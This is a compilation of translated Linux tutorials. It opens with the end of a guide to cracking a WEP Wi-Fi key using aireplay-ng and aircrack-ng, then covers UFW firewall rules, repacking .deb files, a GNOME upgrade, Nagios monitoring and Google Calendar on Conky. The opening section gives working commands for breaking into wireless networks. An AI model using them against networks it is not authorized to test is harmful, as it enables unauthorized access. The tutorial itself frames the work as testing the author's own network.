You'll get output like what's in the window in the background pictured below. Leave that one be. Open a new Konsole window in the foreground, and enter this command:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
Here the ESSID is the access point's SSID name, which in my case is yoyo. What you want to get after this command is the reassuring "Association successful" message with that smiley face.
You're almost there. Now it's time for:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
Here we're creating router traffic to capture more throughput faster to speed up our crack. After a few minutes, that front window will start going crazy with read/write packets. (Also, I was unable to surf the web with the yoyo network on a separate computer while this was going on.) Here's the part where you might have to grab yourself a cup of coffee or take a walk. Basically you want to wait until enough data has been collected to run your crack. Watch the number in the "#Data" column—you want it to go above 10,000. (Pictured below it's only at 854.)
Depending on the power of your network (mine is inexplicably low at -32 in that screenshot, even though the yoyo AP was in the same room as my adapter), this process could take some time. Wait until that #Data goes over 10k, though—because the crack won't work if it doesn't. In fact, you may need more than 10k, though that seems to be a working threshold for many.
Once you've collected enough data, it's the moment of truth. Launch a third Konsole window and run the following to crack that data you've collected:
aircrack-ng -b (bssid) (file name-01.cap)
Here the filename should be whatever you entered above for (file name). You can browse to your Home directory to see it; it's the one with .cap as the extension.
If you didn't get enough data, aircrack will fail and tell you to try again with more. If it succeeds, it will look like this:
The WEP key appears next to "KEY FOUND." Drop the colons and enter it to log onto the network.
### Problems Along the Way ###
With this article I set out to prove that cracking WEP is a relatively "easy" process for someone determined and willing to get the hardware and software going. I still think that's true, but unlike the guy in the video below, I had several difficulties along the way. In fact, you'll notice that the last screenshot up there doesn't look like the others—it's because it's not mine. Even though the AP which I was cracking was my own and in the same room as my Alfa, the power reading on the signal was always around -30, and so the data collection was very slow, and BackTrack would consistently crash before it was complete. After about half a dozen attempts (and trying BackTrack on both my Mac and PC, as a live CD and a virtual machine), I still haven't captured enough data for aircrack to decrypt the key.
So while this process is easy in theory, your mileage may vary depending on your hardware, proximity to the AP point, and the way the planets are aligned. Oh yeah, and if you're on deadline—Murphy's Law almost guarantees it won't work if you're on deadline.
To see the video version of these exact instructions, check out this dude's YouTube video.
Got any experience with the WEP cracking courtesy of BackTrack? What do you have to say about it? Give it up in the comments.
via: http://lifehacker.com/5305094/how-to-crack-a-wi+fi-networks-wep-password-with-backtrack
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How to Install and Configure UFW – An Un-complicated FireWall in Debian/Ubuntu
Since computers are connected to each other, services are growing fast. **Email, Social Media, Online Shop, Chat** until **Web Conferencing** are services that used by user. But on the other side this connectivity just likes a double-side knife. It’s also possible to send bad messages to those computers like **Virus, malware, trojan-apps** are one of them.
![UFW Firewall for Ubuntu](http://www.tecmint.com/wp-content/uploads/2013/12/UFW-Firewall.jpeg)
*Install UFW Firewall*
The Internet, as the biggest computer network is not always fill with good people. In order to make sure our computers / servers are safe, we need to protect it.
One of the must have component on your computer / servers is **Firewall**. From **Wikipedia**, a definition is:
> In computing, a firewall is a software or hardware-based network security system that controls the incoming and outgoing network traffic by analysing the data packets and determining whether they should be allowed through or not, based on applied rule set.
**Iptables** is one of the firewall that widely used by servers. It is a program used to manage incoming and outgoing traffic in the server based on a set of rules. Generally, only trusted connection is allowed to enter the server. But **IPTables** is running at console mode and it’s complicated. Those who’re familiar with iptables rules and commands, they can read the following article that describes how to use iptables firewall.
- [Basic IPTables (Linux Firewall) Guide][1]
### Installation of UFW Firewall in Debian/Ubuntu ###
To reduce the complexity of how-to setting **IPTables**, there is a lot of fronted. If you’re running **Ubuntu** Linux, you will find **ufw** as a default firewall tool. Lets start to explore about **ufw** firewall.
### What is ufw ###
The **ufw (Uncomplicated Firewall)** is an frontend for most widely used **iptables firewall** and it is well comfortable for host-based firewalls. ufw gives a framework for managing **netfilter**, as well as provides a command-line interface for controlling the firewall. It provides user friendly and easy to use interface for Linux newbies who are not much familiar with firewall concepts.
While, on the other side same complicated commands helps administrators it set complicated rules using command line interface. The **ufw** is an upstream for other distributions such as **Debian, Ubuntu** and **Linux Mint**.
#### Basic Usage ufw ####
First, check if **ufw** is installed using following command.
$ sudo dpkg --get-selection | grep ufw
ufw install
If it’s not installed, you can install it using **apt** command as shown below.
$ sudo apt-get install ufw
Before you use, you should check whether **ufw** is running or not. Use the following command to check it.
$ sudo ufw status
If you found Status: **inactive**, it mean it’s not active or disable.
#### Enabling / Disabling ufw ####
To enable it, you just need to type the following command at the terminal.
$ sudo ufw enable
Firewall is active and enabled on system startup
To disable it, just type.
$ sudo ufw disable
#### List the current ufw rules ####
After the firewall is activated you can add your rules into it. If you want to see what are the default rules, you can type.
$ sudo status verbose
##### Sample Output #####
Status: active
Logging: on (low)
Default: deny (incoming), allow (outgoing)
New profiles: skip
#### How to Add ufw rules ####
As you see, by default every incoming connection is denied. If you want to remote your machine then you have to allow proper port. For example you want to allow ssh connection. Here’s the command to allow it.
#### Allow Access ####
$ sudo ufw allow ssh
[sudo] password for pungki :
Rule added
Rule added (v6)
If you check the status again, you will see an output like this.
$ sudo ufw status
To Action From
-- ----------- ------
22 ALLOW Anywhere
22 ALLOW Anywhere (v6)
If you have a lot of rules, and want to put numbers on every rules on the fly, use parameter numbered.
$ sudo ufw status numbered
To Action From
------ ----------- ------
[1] 22 ALLOW Anywhere
[2] 22 ALLOW Anywhere (v6)
The first rule says that incoming connection to **port 22** from **Anywhere**, both **tcp** or **udp** packets is allowed. What if you want to allow **tcp** packet only? Then you can add the parameter **tcp** after the **port** number. Here’s an example with sample output.
$ sudo ufw allow ssh/tcp
To Action From
------ ----------- ------
22/tcp ALLOW Anywhere
22/tcp ALLOW Anywhere (v6)
#### Deny Access ####
The same tricks is applied to Deny rule. Let say you want to deny ftp rule. So you only have to type.
$ sudo ufw deny ftp
To Action From
------ ----------- ------
21/tcp DENY Anywhere
21/tcp DENY Anywhere (v6)
### Adding Specific Port ###
Sometimes we have a custom port which is not follow any standards. Let’s say we change the **ssh** port on our machine from **22**, into **2290**. Then to allow port **2290**, we can add it like this.
$ sudo ufw allow
To Action From
-- ----------- ------
2290 ALLOW Anywhere
2290 ALLOW Anywhere (v6)
It also possible for you to add **port-range** into the rule. If we want to open port from **2290 – 2300** with **tcp** protocol, then the command will be like this.
$ sudo ufw allow 2290:2300/tcp
To Action From
------ ----------- ------
2290:2300/tcp ALLOW Anywhere
2290:2300/tcp ALLOW Anywhere (v6)
while if you want to use **udp**, just use the following command.
$ sudo ufw allow 2290:2300/udp
To Action From
------ ----------- ------
2290:2300/udp ALLOW Anywhere
2290:2300/udp ALLOW Anywhere (v6)
Please remember that you have to put ‘**tcp**’ or ‘**udp**’ explicitly otherwise you will get an error message similar to below.
ERROR: Must specify ‘tcp’ or ‘udp’ with multiple ports
### Adding Specific IP ###
Previously we have added rules based on **service** or **port**. Ufw also allow you to add rules based on **IP Address**. Here’s the sample command.
$ sudo ufw allow from
You can also use a subnet mask to wider the range.
$ sudo ufw allow form
To Action From
-- ----------- ------
Anywhere ALLOW
Anywhere ALLOW
As you can see, from parameter will only limit the source of connection. While the destination – which is represented by **To** column – is **Anywhere**. You can also manage the destination using ‘**To**‘ parameter. Let’s see the sample to allow access to **port 22 (ssh)**.
$ sudo ufw allow to any port 22
The above command will allow access from anywhere and from any protocol to **port 22**.
### Combining Parameters ###
For more specific rules, you can also combining IP Address, **protocol** and **port**. Let’s say we want to create rule that limit the connection only from IP, only protocol **tcp** and to port **22**. Then the command will be like below.
$ sudo ufw allow from proto tcp to any port 22
Syntax to create deny rule is similar with allow rule. You only need to change parameter from **allow** to **deny**.
### Deleting Rules ###
Sometime you may need to delete your existing rule. Once again with **ufw** it is easy to delete rules. From above sample, you have a rule below and you want to delete it.
To Action From
-- ----------- ------
22/tcp ALLOW
21/tcp ALLOW Anywhere
21/tcp ALLOW Anywhere (v6)
There are two methods of deleting rules.
**Method 1**
The below command will **delete** rules that match service **ftp**. So the **21/tcp** which mean **ftp** port will be deleted.
$ sudo ufw delete allow ftp
**Method 2**
But when you tried to delete the first rule at the above example using below command.
$ sudo ufw delete allow ssh
$ sudo ufw delete allow 22/tcp
You may find an error message such as.
Could not delete non-existent rule
Could not delete non-existent rule (v6)
Then you can do this trick. As we mentioned above, you can show the number of rule to indicate which rule that we want to delete. Let we show it to you.
$ sudo ufw status numbered
To Action From
-- ----------- ------
[1] 22/tcp ALLOW
[2] 21/tcp ALLOW Anywhere
[3] 21/tcp ALLOW Anywhere (v6)
Then you can delete the first rule using. Press “**y**” will permanently delete the rule.
$ sudo ufw delete 1
Deleting :
Allow from to any port 22 proto tcp
Proceed with operation (y|n)? y
From those methods you will see the difference. **Method 2** will ask **user confirmation** before deleting the rule while **method 1** is not.
### How to Reset Rules ###
In some situation, you may want to **delete / reset** all rules. You can do it by typing.
$ sudo ufw reset
Resetting all rules to installed defaults. Proceed with operation (y|n)? y
If you press “**y**”, then **ufw** will backup all existing rules before doing the reset your ufw. Resetting the rules will also disable your firewall. You need to enabled it again if you want to use it.
### Advanced Functionality ###
As I stated above, the ufw firewall can able to do whatever that iptables can do. This is accomplished by using various sets of rules files, which are nothing more than **iptables-restore** appropriate text files. Fine tuning ufw and/or placing additional iptables commands not allowed via the ufw command is a matter of editing several text files.
- /etc/default/ufw: The main configuration for default policies, IPv6 support and kernel modules.
- /etc/ufw/before[6].rules: rules in these files are calculate before any rules added via the ufw command.
- /etc/ufw/after[6].rules: rules in these files are calculate after any rules added via the ufw command.
- /etc/ufw/sysctl.conf: kernel network tunables.
- /etc/ufw/ufw.conf: sets whether or not ufw is enabled on boot and sets the LOGLEVEL.
### Conclusion ###
**UFW** as a front-end to iptables surely make an easy interface to user. User don’t need to remember complicated iptables syntax. **UFW** also use ‘**plain english**‘ as its parameter.
**Allow, deny, reset** are one of them. I believe that there are many more iptables front-end out there. But definitely ufw is one of the best alternative for users who want to setup their firewall fast, easy and of course secure. Please visit **ufw manual page** by typing **man ufw** for more detail.
via: http://www.tecmint.com/how-to-install-and-configure-ufw-firewall/
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How to Repack Deb Files on Debian and Ubuntu
**The following tutorial will teach Ubuntu, Linux Mint and Debian GNU/Linux users how to easily unpack and repack a .deb file on their Debian-based Linux operating system.**
Once in a while you reach a moment in life when, among other things, you want to modify a .deb file, to change something in it and repackage it back. But, only if you are truly into computing and hacking.
The following example is a true story, as it happen to me a while ago. A Linux developer created a Debian package (.deb) for a software, which I’ve install on my Ubuntu powered computer with success.
Apparently, the software did not worked correctly, as it was always stuck when it tried to retrieve some files from a Git repository. So, I knew where the files where installed (in the /opt directory), I’ve searched the code, found the issue and repair it in place. After that, the program was no longer stuck when it tried to retrieve the packages it needed.
So, long story short, I wanted to unpack the .deb file, replace the file I’ve patched in it, and repackage it back so I can install it on other computers or give it to my friends. How do I do that?
After searching the Internet for an answer to my problem, I’ve found a small blog called [ailoo.net][1] where it was explained like this:
mkdir -p extract/DEBIAN
dpkg-deb -x package.deb extract/
dpkg-deb -e package.deb extract/DEBIAN [...do something, e.g. edit the control file...]
mkdir build
dpkg-deb -b extract/ build/
These five commands will do the job like a charm. Let me explain them to you: the first one creates a folder called “extract” and a subfolder called “DEBIAN”; the second command will extract some files from your .deb package in the “extract” folder; the third command will extract the content of the .deb package in the “DEBIAN” subfolder, where you can modify/patch the files you want; the fourth command will create a folder called “build”; and the fifth command will repack the modified files into a new .deb package, which will be generated in the “build” folder.
That’s it! Just remember to stick with the commands above, and modify the files visually with a graphical text editor via your default file manager, after you’ve executed the third command. Do not hesitate to comment below if you run into problems during this tutorial.
via: http://news.softpedia.com/news/How-to-Repack-Deb-Files-on-Debian-and-Ubuntu-404930.shtml
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sources/How to Upgrade to GNOME 3.10 in Ubuntu 13.10.md
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sources/How to Upgrade to GNOME 3.10 in Ubuntu 13.10.md
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[翻译中] by KayGuowhu
How to Upgrade to GNOME 3.10 in Ubuntu 13.10
**Ubuntu 13.10 ships with the GNOME 3.8 desktop available in its archives. While a dependable, stable and featured alternative to Unity, it’s also outdated.**
The newer version of the GNOME desktop was released back in September 2013 and comes with a raft of improved features, apps and usability tweaks. From hi-res screen support to new client-side decoration of app windows, GNOME 3.10 is a compelling upgrade.
The good news is that – providing you’re running Ubuntu 13.10, have a decent internet connection, and some command line aptitude (pun fully intended) – you don’t have to stick with a stale version of GNOME.
### How To Upgrade to GNOME 3.10 in Ubuntu 13.10 ###
For the benefit of the skim readers whose eyes dropped straight to the point I’ll reiterate: you **need to be running Ubuntu 13.10 to install GNOME 3.10**.
First, let’s add the GNOME 3 PPA to Ubuntu’s Software Sources. This can be done using a GUI but it is far easier to achieve using the command line.
Open a new *Terminal* window and enter the following command, entering your user password when asked:
sudo add-apt-repository ppa:gnome3-team/gnome3-next && sudo apt-get update
With the PPA added and our package list updated we can move on to installing GNOME 3.10 itself. To do this run the following command, again entering your user password when prompted:
sudo apt-get update && sudo apt-get install gnome-shell ubuntu-gnome-desktop
It can take a while for all the necessary packages and components to be fetched and installed, so try to be patient.
Midway through the installation a prompt will appear in the Terminal asking you to choose what display manager – aka “login screen” – should be used by default.
This decision is entirely up to you; both Ubuntu’s Unity Greeter and the **GNOME Display Manager** let you easily switch between desktop sessions (handy if you want to keep Unity or another desktop around) but only GDM offers GNOME-specific features such as lock-screen notifications.
When you’re ready to decide make your selection using the up/down arrow keys and hit ‘Enter/Return’ to confirm. The installation will then proceed.
### Adding The Extra Stuff ###
GNOME 3.10 comes with some great new features, applications – [including GNOME Weather, Music and Maps][1] – and other miscellaneous changes. Because not all of these are considered ‘stable’ enough to be included in the main GNOME 3 PPA we added earlier, you’ll need to make use of an additional pair of GNOME PPAs if you want to use them.
Now – and it’s important you’re aware of this – some of the packages in these repositories are reported to have stability issues. Most of these will be minor – i.e., the odd app crash or broken feature – but the potential for more major issues, like making GNOME crash entirely, is possible.
Warning out of the way, open up a new tab in a Terminal and punch in the following:
sudo add-apt-repository ppa:gnome3-team/gnome3-staging
sudo add-apt-repository ppa:gnome3-team/gnome3
sudo apt-get update && sudo apt-get dist-upgrade
To add some of the cool apps we mentioned earlier run:
sudo apt-get install gnome-weather gnome-music gnome-maps cheese gnome-documents
With that we’re done!
You may wish to log out and back in (remembering to select the ‘GNOME’ session) to ensure that everything takes effect correctly.
### Minor Differences ###
If you’ve kept Unity installed alongside GNOME 3.10 then there are a few things you’ll need to note down.
First off, you’ll find **two entries for ‘Online Accounts’ in System Settings**. The one with the key-themed icon is the Unity version, and the one with the plug emblem is GNOME’s.
Some apps will require you to add accounts to the Unity version (Shotwell, Gwibber, Empathy) and some to the GNOME one (Evolution, Documents, Contacts).
The ‘Notifications’ and ‘Search’ entries are GNOME-specific, both letting you pick and choose which applications and sources are able to show notifications or appear in the Activities Overlay.
### Uninstalling GNOME 3.10 ###
So you’ve tried it and didn’t like it. Now what?
Removing GNOME 3.10 is a fairly straightforward processing providing we use a command-line tool called ‘PPA Purge’. It can be found in the Ubuntu Software Center and is by far the easiest way to automatically remove and/or downgrade packages installed from PPAs.
- [Install PPA Purge from Ubuntu Software Center][2]
To use the tool we’ll need to go back to the terminal and enter the following, taking care to look out for any prompts that may appear during the downgrade process.
sudo ppa-purge ppa:gnome3-team/gnome3-next
If you also added the optional extra PPAs you will also need to purge those as well:
sudo ppa-purge ppa:gnome3-team/gnome3-staging
sudo ppa-purge ppa:gnome3-team/gnome3
Once completed you should be left with the stock GNOME 3.8 desktop. If you don’t want to keep GNOME Shell around at all you can proceed to remove it:
sudo apt-get remove gnome-shell ubuntu-gnome-desktop
Finally, manually remove any remaining applications that persist after downgrade (e.g., Epiphany and GNOME Documents), then reboot.
via: http://www.omgubuntu.co.uk/2013/12/upgrade-gnome-3-10-ubuntu-13-10
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sources/How to install and configure Nagios on Linux.md
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sources/How to install and configure Nagios on Linux.md
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Translating by icybreaker
How to install and configure Nagios on Linux
[Nagios][1] is one of the most powerful network monitoring systems, which is widely used in the industry. It can actively monitor any network, and generate audio/email warnings and alerts when any problem is detected. The check types and alert timers are fully customizable.
Another incredible capability of Nagios is that it can monitor both hosts and services e.g., it can monitor IP addresses and TCP/UDP port numbers. To explain a little, let us assume that there is a web server that we want to monitor. Nagios can check whether the server is online by running ping on the IP/name of the server as well as it can be set up to provide warnings in case the round trip time (RTT) to the server increases. Further, Nagios can also check whether TCP port 80 (web server) is reachable e.g., the server is online but Apache/IIS is not responding.
There are also 3rd party monitoring tools that are based on Nagios, such as [Centreon][2], [FAN][3] , [op5 Monitor][4], which supplement standalone Nagios engine in terms of interface, automation, and technical support.
This tutorial explains **how to install and configure Nagios on Linux**.
### Install Nagios on Debian or Ubuntu ###
On a Debian-based system, the installation in itself is a very simple process thanks to apt-get.
root@mrtg:~# apt-get install nagios3
The mail server setting can be done during Nagios installation. It can also be configured later when needed.
Note: A valid SMTP configuration is needed for Nagios to be able send email notifications.
As it can be seen, Nagios supports multiple options for email delivery. The most common options would be Internet Site where the server sends email directly to the recipient. Another widely used option is using smarthost or relay server, in which the server sends the email to an intermediary mail server which in turn is responsible for delivering the mail to the recipient.
Next, the domain name of the server has to be included in the next step.
Finally, the password for the Nagios admin user ‘nagiosadmin’ is set. This value can also be changed later.
### Install Nagios on CentOS or RHEL ###
yum is used for installation. After [setting up the repoforge repository][8], run yum as follows.
[root@mrtg ~]# yum install nagios nagios-plugins
### Requirements for Monitoring ###
In this tutorial, we want to monitor the following.
1. All Linux server will be checked every 3 minutes.
1. All Cisco Routers will be checked every 3 minutes.
1. All email alerts should go to the address sentinel@example.tst.
1. Nagios will verify 3 times before sending out any alerts just to be sure that the problem is real.
1. If the RTT to any device exceeds 100 ms and/or packet loss exceeds 20%, email alert will be generated.
The rest of the tutorial will guide you to configure Nagios on Linux.
### Nagios Configuration on Ubuntu ###
It is important to know where Nagios configuration files are located. The following table shows the location of Nagios configuration files on Debian-based systems.
/etc/nagios-plugins Customizable scripts used for monitoring
/etc/nagios3 Configuration files to add hosts, services, define checks and timers
/usr/lib/nagios/plugins Executable files used for monitoring
The following steps are inter-related. Hosts, groups for hosts and adding services to host groups are defined.
### Adding Host Template ###
The templates defining what to do with a type host is defined. We use the files provided with the installation as sample.
First, define a host template for Linux devices
root@mrtg:~# cd /etc/nagios3/conf.d
root@mrtg:/etc/nagios3/conf.d/# cp generic-host_nagios2.cfg linux-server.cfg
Edit linux-server.cfg as follows. The parts with bold font are modified.
root@mrtg:/etc/nagios3/conf.d/# vim linux-server.cfg
> define host{
> name linux-server
> notifications_enabled 1
> event_handler_enabled 1
> flap_detection_enabled 1
> failure_prediction_enabled 1
> process_perf_data 1
> retain_status_information 1
> retain_nonstatus_information 1
> check_command example-host-check ; the script to be used while checking
> check_interval 3 ; the interval between consecutive checks
> max_check_attempts 3 ; number of rechecking before generating email alerts
> notification_interval 0
> notification_period 24x7
> notification_options d,u,r
> contact_groups admins ; the group where emails will be sent
> register0
> }
Next, define a host template for Cisco devices.
root@mrtg:/etc/nagios3/conf.d/# cp linux-server.cfg cisco-device.cfg
Modify cisco-device.cfg as follows. The bold-font parts are modified.
root@mrtg:/etc/nagios3/conf.d/# vim cisco-device.cfg
> # The highlighted parts are modified
> define host{
> name cisco-device
> notifications_enabled 1
> event_handler_enabled 1
> flap_detection_enabled 1
> failure_prediction_enabled 1
> process_perf_data 1
> retain_status_information 1
> retain_nonstatus_information 1
> check_command example-host-check ; the script to be used while checking
> check_interval 3 ; the interval between consecutive checks
> max_check_attempts 3 ; number of rechecking before generating email alerts
> notification_interval 0
> notification_period 24x7
> notification_options d,u,r
> contact_groups admins ; the group where emails will be sent
> register 0
> }
### Adding Host ###
Now that the host template is defined, the actual host to be monitored is added. Again, the files provided by default are used as sample.
root@mrtg:/etc/nagios3/conf.d/# cp localhost_nagios2.cfg example.cfg
root@mrtg:/etc/nagios3/conf.d/# vim example.cfg
> # Host 1
> define host{
> use linux-server ; Name of host template to use
> host_name our-server ; The hostname to be used by nagios
> alias our-server
> address ; The IP address of the host
> }
> # Host 2
> define host{
> use cisco-device ; Name of host template to use
> host_name our-router ; The hostname to be used by nagios
> alias our-router
> address ; The IP address of the host
> }
### Host Group Definition ###
For ease of management when there are multiple hosts, it is advisable that hosts of similar types are grouped together.
root@mrtg:/etc/nagios3/conf.d/# vim hostgroups_nagios2.cfg
> definehostgroup {
> hostgroup_name linux-server ; the name of the host group
> alias Linux Servers
> members our-server ; comma separated list of members
> }
> definehostgroup {
> hostgroup_name cisco-device ; the name of the host group
> alias Cisco Devices
> members our-server ; comma separated list of members
> }
### Service Definition ###
First, the command example-host-check is defined with warning value of 100 ms for latency and 20% for packet loss. Critical values are 5000 ms for latency and 100% packet loss. One IPv4 ping request is transmitted.
root@mrtg:~# vim /etc/nagios-plugins/config/ping.cfg
> define command{
> command_name example-host-check
> command_line /usr/lib/nagios/plugins/check_ping -H '$HOSTADDRESS$' -w 100,20% -c 5000,100% -p 1 -4
> }
Then, the command is associated with host groups.
root@mrtg:/etc/nagios3/conf.d/# vim services_nagios2.cfg
> define service {
> hostgroup_name linux-server
> service_description Linux Servers
> check_command example-host-check
> use generic-service
> notification_interval 0 ; set 0 if you want to be renotified
> }
> define service {
> hostgroup_name cisco-device
> service_description Cisco Devices
> check_command example-host-check
> use generic-service
> notification_interval 0 ; set 0 if you want to be renotified
> }
### Contact Definition ###
The required address for sending email added to Nagios.
> define contact{
> contact_name root
> alias Root
> service_notification_period 24x7
> host_notification_period 24x7
> service_notification_options w,u,c,r
> host_notification_options d,r
> service_notification_commands notify-service-by-email
> host_notification_commands notify-host-by-email
> email root@localhost, sentinel@example.tst
> }
Finally, a dry run is initiated to check whether there are any configuration errors. If there are no errors, Nagios can be (re)started safely.
root@mrtg:~#nagios –v /etc/nagios3/nagios.cfg
root@mrtg:~# service nagios3 restart
### Nagios Configuration on CentOS/RHEL ###
The following shows the locations of Nagios configuration files on Redhat-based systems.
> /etc/nagios/objects Configuration files to add hosts, services, define checks and timers
> /usr/lib/nagios/plugins Executable files used for monitoring
### Adding Host Template ###
A template is created to define what needs to be done for a specific type of host. The files provided with the installation is modified.
[root@mrtg objects]# cd /etc/nagios/objects/
[root@mrtg objects]# vim templates.cfg
> define host{
> name linux-server
> use generic-host
> check_period 24x7
> check_interval 3
> retry_interval 1
> max_check_attempts 3
> check_command example-host-check
> notification_period 24x7
> notification_interval 0
> notification_options d,u,r
> contact_groups admins
> register 0
> }
> define host{
> name cisco-router
> use generic-host
> check_period 24x7
> check_interval 3
> retry_interval 1
> max_check_attempts 3
> check_command example-host-check
> notification_period 24x7
> notification_interval 0
> notification_options d,u,r
> contact_groups admins
> register 0
> }
### Adding Hosts and Host Groups ###
The configuration file provided with by default is used as a sample. The hosts and host groups are added in the same file.
[root@mrtg objects]# cp localhost.cfg example.cfg
[root@mrtg objects]# vim example.cfg
> #Adding Linux server
> define host{
> use linux-server
> host_name our-server
> alias our-server
> address
> }
> #Adding Cisco Router
> define host{
> use cisco-router
> host_name our-router
> alias our-router
> address
> }
> define hostgroup{
> hostgroup_name linux-servers
> alias Linux Servers
> members our-server
> }
> define hostgroup{
> hostgroup_name cisco-router
> alias cisco-router
> members our-router
> }
### Service Definition ###
A service called example-host-check is defined with warning values of 100 ms for latency and 20% for packet loss. The critical values are 5000 ms for latency and 100% for packet loss. Only one IPv4 ping request will be transmitted.
[root@mrtg objects]# vim commands.cfg
> define command{
> command_name example-host-check
> command_line $USER1$/check_ping -H $HOSTADDRESS$ -w 100.0,20% -c 5000.0,100% -p 1 -4
> }
### Contact Definition ###
The email address where alerts will be sent is added into Nagios.
> define command{
> command_name example-host-check
> command_line $USER1$/check_ping -H $HOSTADDRESS$ -w 100.0,20% -c 5000.0,100% -p 1 -4
> }
### Contact Definition ###
The email address where alerts will be sent is added into Nagios.
[root@objects objects]# vim contacts.cfg
> define contact{
> contact_name nagiosadmin
> use generic-contact
> alias Nagios Admin
> email nagios@localhost, sentinel@example.tst
> }
Finally, we are ready to start the Nagios service. A dry run is recommended to find out errors in configuration.
[root@mrtg ~]# nagios –v /etc/nagios/nagios.cfg
[root@mrtg ~]# service nagios restart
[root@mrtg ~]# chkconfig nagios on
### Access Nagios after Configuration ###
Now you are ready to use Nagios. Nagios can be accessed by opening the URL http://IP/nagios3 in case of Ubuntu/Debian or http://IP/nagios in case of CentOS/RHEL e.g. The user "nagiosadmin" needs to be authenticated to access the page.
When Nagios is not running the way it is supposed to, the first thing to do would be to initiate a dry run.
On Debian or Ubuntu:
# nagios3 -v /etc/nagios3/nagios.cfg
On CentOS or RHEL:
# nagios -v /etc/nagios/nagios.cfg
The log file may also shed some important clue. The path to the log file is located at /var/log/nagios/nagios.log.
Hope this helps.
via: http://xmodulo.com/2013/12/install-configure-nagios-linux.html
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sources/How to integrate Google Calendar in Linux desktop.md
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sources/How to integrate Google Calendar in Linux desktop.md
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How to integrate Google Calendar in Linux desktop
Google Calendar is one of the most popular web applications. One can access or sync Google Calendar across multiple devices either via web interface or with native apps. In Linux, there are several ways to access Google Calendar natively, such as by using email client plugins (e.g., Evolution or Thunderbird) or calendar apps (e.g., Sunbird or Rainlendar). These solutions, however, typically involve installing unnecessarily bulky software which you will probably not need.
If all you want is to access and get reminded by Google Calendar natively on Linux, then you can consider [Google Calendar command line interface (or gcalcli)][1], which is much more light-weight. Even better for Linux desktop, you can use gcalcli together with [Conky][2], to integrate Google Calendar into your desktop theme transparently.
In this tutorial, I will demonstrate **how to integrate Google Calendar into Linux desktop, by using gcalcli and Conky**.
### Install gcalcli on Linux ###
Before installing gcalcli, verify that you are using Python 2, as gcalcli is not compatible with Python 3.
To install gcalcli on Debian, Ubuntu or Linux Mint, use the following commands.
$ sudo apt-get install git python-pip python-gdata python-dateutil python-gflags python-vobject python-parsedatetime
$ sudo pip install google-api-python-client
$ sudo pip install apiclient urllib3
$ git clone https://github.com/insanum/gcalcli.git
$ cd gcalcli
$ sudo python setup.py install
**Note**: gcalcli is included in the standard repository of Ubuntu or Linux mint. However, that version is not updated with the latest features and bug fixes. So I recommend building gcalcli from the source, as documented above.
To install gcalcli on Fedora, CentOS or RHEL, run the following.
$ sudo yum install git python-pip python-gdata python-dateutil python-gflags python-vobject
$ sudo pip install google-api-python-client
$ sudo pip install apiclient urllib3
$ git clone https://github.com/insanum/gcalcli.git
$ cd gcalcli
$ sudo python setup.py install
### Google Authentication for gcalcli ###
To be able to access Google Calendar with gcalcli, you need to go through OAuth2 authention with your Google account, in order to grant gcalcli permission to access your Google Calendar.
The first time you run gcalcl, OAuth2 authentication will automatically be initiated. Thus run the following command to start.
$ gcalcli agenda
The command will print out a URL as shown below.
At the same time, it will pop up a web browser window, and direct you to the URL. If a web browser window fails to open for any reason, you can copy and paste the URL into a web browser window manually.
If you are not logged in to your Google account, you will be asked to log in. After logging in, you will see the following message, asking you to allow gcalcl to manage your Google Calendar. Click on "Accept" button.
Enable Google Calendar API
After authentication, the next step is to enable API access for Google Calendar. gcalcli accesses your Google Calendar via Google Calendar API. In order to use Google Calendar API, however, you need to explicitly enable the API under your Google account.
First go to: [https://cloud.google.com/console][5]. Click on "API Project" under project list.
Go to "APIs & auth" --> "APIs" to see a list of Google APIs. Click on toggle button for "Calendar API" to enable the API.
Now go to "APIs & auth" --> "Registered apps" to register gcalcli app. Click on "Register app" button on the top.
Fill in the app name (e.g., "My Gcalcli"), and choose "Native" as a platform. Click on "Register" button to finalize.
This will create and show OAuth client ID and secret as follows. Make a note of this information. You can ignore the warning saying that "You have not set up your product name".
The result of OAuth authentication will be saved in ~/.gcalcli_oauth text file.
### Access Google Calendar from the Command Line with gcalcli ###
You are almost ready to access Google Calendar with gcalcli.
Create a gcalcli configuration file in your home directory as follows. Put OAuth client ID and secret that you obtained before, in the following format.
$ vi ~/.gcalclirc
> --client_id='XXXXXXXXXX.apps.googleusercontent.com'
> --client_secret='YYYYYYYYYYYYYYYY'
At this point, you should be able to run gcalcli from the command line.
Try the following two commands, which will print a list of your Google Calendars, and an agenda for the next 5 days, respectively.
$ gcalcli list
$ gcalcli agenda
### Integrate gcalcli with Conky ###
The final step is to integrate the output of gcalcli into your desktop theme. For that, you need Conky, which is a very powerful tool that can display a wide range of information directly on desktop theme.
First [install Conky][9] on your Linux system.
Then, create a following script somewhere in your home directory (e.g., ~/bin).
$ vi ~/bin/gcal.sh
> #!/bin/sh
> gcalcli --conky calw 2 |
> sed -e 's/^[(0\x71^[(B/?/g' \
> -e 's/^[(0\x78^[(B/?/g' \
> -e 's/^[(0\x6A^[(B/?/g' \
> -e 's/^[(0\x6B^[(B/?/g' \
> -e 's/^[(0\x6C^[(B/?/g' \
> -e 's/^[(0\x6D^[(B/?/g' \
> -e 's/^[(0\x6E^[(B/?/g' \
> -e 's/^[(0\x74^[(B/?/g' \
> -e 's/^[(0\x75^[(B/?/g' \
> -e 's/^[(0\x76^[(B/?/g' \
> -e 's/^[(0\x77^[(B/?/g'
$ chmod +x ~/bin/gcal.sh
**Important Note**: '^[' in the above script must be the **actual ESCAPE key** (i.e. press Ctrl-V ESC in vi editor).
This script translates VT100 escape sequences to Unicode box drawing characters. This is a [needed workaround][10] because Conky does not support ASCII line art used by gcalcli.
Finally, create a Conky configuration file in your home directory as follows.
$ vi ~/.conkyrc
> alignment top_right
> maximum_width 630
> minimum_size 330 10
> gap_x 25
> gap_y 50
> own_window yes
> own_window_type conky
> own_window_hints undecorated,below,sticky,skip_taskbar,skip_pager
> own_window_transparent yes
> own_window_argb_visual yes
> own_window_argb_value 0
> update_interval 300
> background no
> border_width 1
> default_color cornflowerblue
> default_outline_color white
> default_shade_color white
> double_buffer no
> draw_borders no
> draw_graph_borders no
> draw_outline no
> draw_shades no
> max_port_monitor_connections 64
> max_specials 512
> max_user_text 16384
> text_buffer_size 8096
> no_buffers yes
> out_to_console no
> uppercase no
> use_xft yes
> xftfont Bitstream Vera Sans Mono:size=10
> *** Google Calendar Agenda ***
> ${execpi 300 gcalcli --conky agenda}
